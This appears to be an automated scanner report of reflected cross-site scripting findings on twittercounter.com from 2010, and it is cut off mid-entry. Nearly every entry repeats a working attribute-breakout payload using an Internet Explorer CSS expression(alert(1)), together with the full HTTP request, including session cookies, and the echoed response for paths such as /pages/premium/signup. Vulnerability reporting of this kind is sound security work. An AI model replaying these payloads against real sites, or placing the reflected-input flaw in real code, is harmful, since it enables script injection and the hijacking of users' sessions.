The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e99e2"style%3d"x%3aexpression(alert(1))"bb95d738dd9 was submitted in the REST URL parameter 2. This input was echoed as e99e2"style="x:expression(alert(1))"bb95d738dd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/dummyvaluee99e2"style%3d"x%3aexpression(alert(1))"bb95d738dd9 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:03 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/dummyvaluee99e2"style="x:expression(alert(1))"bb95d738dd9" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e132"style%3d"x%3aexpression(alert(1))"1b1ccf46469 was submitted in the REST URL parameter 1. This input was echoed as 7e132"style="x:expression(alert(1))"1b1ccf46469 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages7e132"style%3d"x%3aexpression(alert(1))"1b1ccf46469/featured HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:17:57 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23769
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages7e132"style="x:expression(alert(1))"1b1ccf46469/featured" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17f5a"style%3d"x%3aexpression(alert(1))"3e779b73787 was submitted in the REST URL parameter 2. This input was echoed as 17f5a"style="x:expression(alert(1))"3e779b73787 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/featured17f5a"style%3d"x%3aexpression(alert(1))"3e779b73787 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:02 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23632
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/featured17f5a"style="x:expression(alert(1))"3e779b73787" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f1ec"style%3d"x%3aexpression(alert(1))"29bbb51d26c was submitted in the REST URL parameter 1. This input was echoed as 2f1ec"style="x:expression(alert(1))"29bbb51d26c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages2f1ec"style%3d"x%3aexpression(alert(1))"29bbb51d26c/friends HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:16 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23665
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages2f1ec"style="x:expression(alert(1))"29bbb51d26c/friends" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af5d"style%3d"x%3aexpression(alert(1))"1a80d0a6698 was submitted in the REST URL parameter 2. This input was echoed as 1af5d"style="x:expression(alert(1))"1a80d0a6698 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/friends1af5d"style%3d"x%3aexpression(alert(1))"1a80d0a6698 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:19 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/friends1af5d"style="x:expression(alert(1))"1a80d0a6698" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 651f4"style%3d"x%3aexpression(alert(1))"21dd81ffa16 was submitted in the REST URL parameter 1. This input was echoed as 651f4"style="x:expression(alert(1))"21dd81ffa16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages651f4"style%3d"x%3aexpression(alert(1))"21dd81ffa16/help HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:22:45 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23688
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages651f4"style="x:expression(alert(1))"21dd81ffa16/help" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 472d7"style%3d"x%3aexpression(alert(1))"ba59875e09f was submitted in the REST URL parameter 2. This input was echoed as 472d7"style="x:expression(alert(1))"ba59875e09f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/help472d7"style%3d"x%3aexpression(alert(1))"ba59875e09f HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:22:52 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23640
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/help472d7"style="x:expression(alert(1))"ba59875e09f" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0985"style%3d"x%3aexpression(alert(1))"a55ff77787a was submitted in the REST URL parameter 1. This input was echoed as e0985"style="x:expression(alert(1))"a55ff77787a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagese0985"style%3d"x%3aexpression(alert(1))"a55ff77787a/premium HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:01 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 25199
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagese0985"style="x:expression(alert(1))"a55ff77787a/premium" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71694"style%3d"x%3aexpression(alert(1))"8e2c6f675d9 was submitted in the REST URL parameter 2. This input was echoed as 71694"style="x:expression(alert(1))"8e2c6f675d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/premium71694"style%3d"x%3aexpression(alert(1))"8e2c6f675d9 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:18:06 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/premium71694"style="x:expression(alert(1))"8e2c6f675d9" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7413a"style%3d"x%3aexpression(alert(1))"08eeb454816 was submitted in the REST URL parameter 1. This input was echoed as 7413a"style="x:expression(alert(1))"08eeb454816 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages7413a"style%3d"x%3aexpression(alert(1))"08eeb454816/premium/signup HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:45 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24161
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages7413a"style="x:expression(alert(1))"08eeb454816/premium/signup" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef43b"style%3d"x%3aexpression(alert(1))"7fa7067be9 was submitted in the REST URL parameter 2. This input was echoed as ef43b"style="x:expression(alert(1))"7fa7067be9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/premiumef43b"style%3d"x%3aexpression(alert(1))"7fa7067be9/signup HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:53 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23859
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/premiumef43b"style="x:expression(alert(1))"7fa7067be9/signup" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52e3b"style%3d"x%3aexpression(alert(1))"98b375bc42a was submitted in the REST URL parameter 3. This input was echoed as 52e3b"style="x:expression(alert(1))"98b375bc42a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/premium/signup52e3b"style%3d"x%3aexpression(alert(1))"98b375bc42a HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:55 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 34348
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/premium/signup52e3b"style="x:expression(alert(1))"98b375bc42a" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fca6a"style%3d"x%3aexpression(alert(1))"45892e12756 was submitted in the REST URL parameter 1. This input was echoed as fca6a"style="x:expression(alert(1))"45892e12756 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesfca6a"style%3d"x%3aexpression(alert(1))"45892e12756/remote HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:39 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23707
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesfca6a"style="x:expression(alert(1))"45892e12756/remote" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76d9f"style%3d"x%3aexpression(alert(1))"d790dff733c was submitted in the REST URL parameter 2. This input was echoed as 76d9f"style="x:expression(alert(1))"d790dff733c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/remote76d9f"style%3d"x%3aexpression(alert(1))"d790dff733c HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:47 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23639
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/remote76d9f"style="x:expression(alert(1))"d790dff733c" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba298"style%3d"x%3aexpression(alert(1))"11548837844 was submitted in the REST URL parameter 1. This input was echoed as ba298"style="x:expression(alert(1))"11548837844 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pagesba298"style%3d"x%3aexpression(alert(1))"11548837844/search HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:14 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pagesba298"style="x:expression(alert(1))"11548837844/search" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a702"style%3d"x%3aexpression(alert(1))"f33867ae0b3 was submitted in the REST URL parameter 2. This input was echoed as 8a702"style="x:expression(alert(1))"f33867ae0b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages/search8a702"style%3d"x%3aexpression(alert(1))"f33867ae0b3 HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.10.10.1289844869;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:23:30 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages/search8a702"style="x:expression(alert(1))"f33867ae0b3" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a38"style%3d"x%3aexpression(alert(1))"65139fdbbb5 was submitted in the REST URL parameter 1. This input was echoed as 44a38"style="x:expression(alert(1))"65139fdbbb5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /pages44a38"style%3d"x%3aexpression(alert(1))"65139fdbbb5/search/ HTTP/1.1 Host: twittercounter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmx=182576163.00012217552135076986:2:0; __utmxx=182576163.00012217552135076986:1354773:2592000; __utmz=182576163.1289354243.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=92mc709ehhd72808qu87090di0; __utma=182576163.649751160.1289354243.1289359620.1289844869.3; tc-remote33091=1; __utmc=182576163; __utmb=182576163.23.9.1289844930877;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 18:27:29 GMT Server: Apache/2.2.14 (Fedora) PHP/5.3.2 X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 23676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <meta rel="canonical" href="http://twittercounter.com/pages44a38"style="x:expression(alert(1))"65139fdbbb5/search/" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bde85"style%3d"x%3aexpression(alert(1))"3d75a5f9c26 was submitted in the REST URL parameter 2. This input was echoed as bde85"style="x:expression(alert(1))"3d75a5f9c26 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
